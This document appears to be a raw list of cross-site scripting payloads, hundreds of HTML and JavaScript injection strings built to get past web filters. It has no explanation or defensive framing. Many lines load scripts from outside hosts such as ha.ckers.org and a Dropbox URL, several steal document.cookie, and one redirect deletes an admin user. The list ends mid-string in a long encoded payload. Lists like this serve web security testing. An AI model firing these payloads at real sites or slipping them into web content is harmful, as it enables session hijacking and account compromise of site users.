<img\x13src=x onerror="javascript:alert(1)">
<img\x32src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
<img\x11src=x onerror="javascript:alert(1)">
<img \x47src=x onerror="javascript:alert(1)">
<img \x34src=x onerror="javascript:alert(1)">
<img \x39src=x onerror="javascript:alert(1)">
<img \x00src=x onerror="javascript:alert(1)">
<img src\x09=x onerror="javascript:alert(1)">
<img src\x10=x onerror="javascript:alert(1)">
<img src\x13=x onerror="javascript:alert(1)">
<img src\x32=x onerror="javascript:alert(1)">
<img src\x12=x onerror="javascript:alert(1)">
<img src\x11=x onerror="javascript:alert(1)">
<img src\x00=x onerror="javascript:alert(1)">
<img src\x47=x onerror="javascript:alert(1)">
<img src=x\x09onerror="javascript:alert(1)">
<img src=x\x10onerror="javascript:alert(1)">
<img src=x\x11onerror="javascript:alert(1)">
<img src=x\x12onerror="javascript:alert(1)">
<img src=x\x13onerror="javascript:alert(1)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
<img src=x onerror=\x09"javascript:alert(1)">
<img src=x onerror=\x10"javascript:alert(1)">
<img src=x onerror=\x11"javascript:alert(1)">
<img src=x onerror=\x12"javascript:alert(1)">
<img src=x onerror=\x32"javascript:alert(1)">
<img src=x onerror=\x00"javascript:alert(1)">
<a href=javascript:javascript:alert(1)>XXX</a>
<img src="x` `<script>javascript:alert(1)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(1)//">
<title onpropertychange=javascript:alert(1)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
<script src="/\%(jscript)s"></script>
<script src="\\%(jscript)s"></script>
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a>
<style>*[{}@import'%(css)s?]</style>X
XXX
XXX
<// style=x:expression\28javascript:alert(1)\29>
<style>*{x:expression(javascript:alert(1))}</style>
X
X <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
X
X
XXX <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
<x style="background:url('x;color:red;/*')">XXX</x>
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`>
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>>
<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
<x style="behavior:url(%(sct)s)">
<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
<event-source src="%(event)s" onload="javascript:alert(1)">
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
x <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(1)>">
<script>%(payload)s</script>
<script src=%(jscript)s></script>
<script language='javascript' src='%(jscript)s'></script>
<script>javascript:alert(1)</script>
<IMG SRC="javascript:javascript:alert(1);">
<IMG SRC=javascript:javascript:alert(1)>
<IMG SRC=`javascript:javascript:alert(1)`>
<SCRIPT SRC=%(jscript)s?
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
<BODY ONLOAD=javascript:alert(1)>
<BODY ONLOAD=javascript:javascript:alert(1)>
<IMG SRC="jav ascript:javascript:alert(1);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
<SCRIPT/SRC="%(jscript)s"></SCRIPT>
<<SCRIPT>%(payload)s//<</SCRIPT>
<IMG SRC="javascript:javascript:alert(1)"
<iframe src=%(scriptlet)s <
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
<IMG DYNSRC="javascript:javascript:alert(1)">
<IMG LOWSRC="javascript:javascript:alert(1)">
<BGSOUND SRC="javascript:javascript:alert(1);">
<LAYER SRC="%(scriptlet)s"></LAYER>
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
<STYLE>@import'%(css)s';</STYLE>
<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
<XSS STYLE="behavior: url(%(htc)s);">
<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE>- XSS
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">
<XSS STYLE="xss:expression(javascript:alert(1))">
<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
<BASE HREF="javascript:javascript:alert(1);//">
<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><IMG SRC="javascript:javascript:alert(1)"></XML>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>
<SCRIPT SRC="%(jpg)s"></SCRIPT>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
<body onscroll=javascript:alert(1)>
<input autofocus>
<STYLE>@import'%(css)s';</STYLE>
<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
<style onreadystatechange=javascript:javascript:alert(1);></style>
<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
<embed code=%(scriptlet)s></embed>
<embed code=javascript:javascript:alert(1);></embed>
<embed src=%(jscript)s></embed>
<frameset onload=javascript:javascript:alert(1)></frameset>
<object onerror=javascript:javascript:alert(1)>
<embed type="image" src=%(scriptlet)s></embed>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
<IMG SRC=&{javascript:alert(1);};>
<a href="javAascript:javascript:alert(1)">test1</a>
<a href="javaascript:javascript:alert(1)">test1</a>
<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed>
<iframe srcdoc="<iframe/srcdoc=<img/src=''onerror=javascript:alert(1)>>">
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
;!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE>
- XSS
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
<iframe src=" javascript:prompt(1) ">
<svg><style>{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<sVg><scRipt >alert(1) {Opera}
<img/src=`` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript:confirm(1)"
<img src=``
onerror=alert(1)
<script/ src='https://dl.dropbox.com/u/13018058/js.js' / ></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /**/>/**/alert(1)/**/</script /**/
">
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
1
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'>
<img/
 src=`~` onerror=prompt(1)>
<form><iframe
 src="javascript:alert(1)"
;>
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
>X</a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<img/src=@ onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</style ><script :-(>/**/alert(document.location)/**/</script :-(
�</form><input type="date" onfocus="alert(1)">
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
<iframe srcdoc='<body onload=prompt(1)>'>
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
<script ~~~>alert(0%0)</script ~~~>
<style/onload=<!-- >
alert
(1)>
<///style///>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover= prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert(1)'>^__^
X {IE7}
<iframe// src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'/</style>
<a/href="javascript: javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1)
</svg><svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
<a href="javascript:\u0061le%72t(1)"><button>
DIV
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
On Mouse Over
<a href=javascript:alert(document.cookie)>Click Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` X
<iframe src=j a v a s c r i p t :a l e r t %28 1 %29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
<object data=javascript:\u0061le%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=<!-->
alert(1)>
<script itworksinallbrowsers>/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
<svg><script>//
confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<script x> alert(1) </script 1=2
style="x:">
<--`<img/src=` onerror=alert(1)> --!>
<script/src=data:text/javascript,alert(1)></script>
x</button>
"><img src=x onerror=window.open('https://www.google.com/');>
<form><button formaction=javascript:alert(1)>CLICKME
<math><a xlink:href="//jsfiddle.net/t846h/">click
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
;!--"<XSS>=&{()}
'>//\\,<'>">">"*"
'); alert('XSS
<script>alert(1);</script>
<script>alert('XSS');</script>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=foo.png onerror=alert(/xssed/) />
<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
<marquee><script>alert('XSS')</script></marquee>
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
"><script>alert(0)</script>
<script src=http://yoursite.com/your_files.js></script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(/xss/)</script>
<IMG LOWSRC=\"javascript:alert('XSS')\">
<IMG DYNSRC=\"javascript:alert('XSS')\">
<img src="javascript:alert('XSS')">
<script language="JavaScript">alert('XSS')</script>
<body onunload="javascript:alert('XSS');">
<body onLoad="alert('XSS');"
[color=red' onmouseover="alert('xss')"]mouse over[/color]
"/></a></><img src=1.gif onerror=alert(1)>
window.alert("Bonjour !");
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
"><script alert(String.fromCharCode(88,83,83))</script>
'>><marquee>XSS
</marquee>
'">><script>alert('XSS')</script>
'">><marquee>XSS
</marquee>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
<script>var var = 1; alert(var)</script>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
<IMG SRC='vbscript:msgbox(\"XSS\")'>
" onfocus=alert(document.domain) "> <"
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE>- XSS
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
<scrscriptipt>alert(1)</scrscriptipt>
</script><script>alert(1)</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
[color=red width=expression(alert(123))][color]
<BASE HREF="javascript:alert('XSS');//">
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
"></iframe><script>alert(123)</script>
<body onLoad="while(true) alert('XSS');">
'"></title><script>alert(1111)</script>
</textarea>'"><script>alert(document.cookie)</script>
'""><script language="JavaScript"> alert('X \nS \nS');</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
<html><noalert><noscript>(123)</noscript><script>(123)</script>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
'></select><script>alert(123)</script>
'>"><script src = 'http://www.site.com/XSS.js'></script>
}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
<SCRIPT>document.write("XSS");</SCRIPT>
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
='><script>alert("xss")</script>
<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
src="http://www.site.com/XSS.js"></script>
data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
!--" /><script>alert('xss');</script>
<script>alert("XSS by \nxss")</script><marquee>XSS by xss
</marquee>
"><script>alert("XSS by \nxss")</script>><marquee>XSS by xss
</marquee>
'"></title><script>alert("XSS by \nxss")</script>><marquee>XSS by xss
</marquee>
<img """><script>alert("XSS by \nxss")</script><marquee>XSS by xss
</marquee>
<script>alert(1337)</script><marquee>XSS by xss
</marquee>
"><script>alert(1337)</script>"><script>alert("XSS by \nxss
</marquee>
'"></title><script>alert(1337)</script>><marquee>XSS by xss
</marquee>
<iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee>XSS by xss
</marquee>
'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'
http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??
http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??
'); alert('xss'); var x='
\\'); alert(\'xss\');var x=\'
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
>"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>
<img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048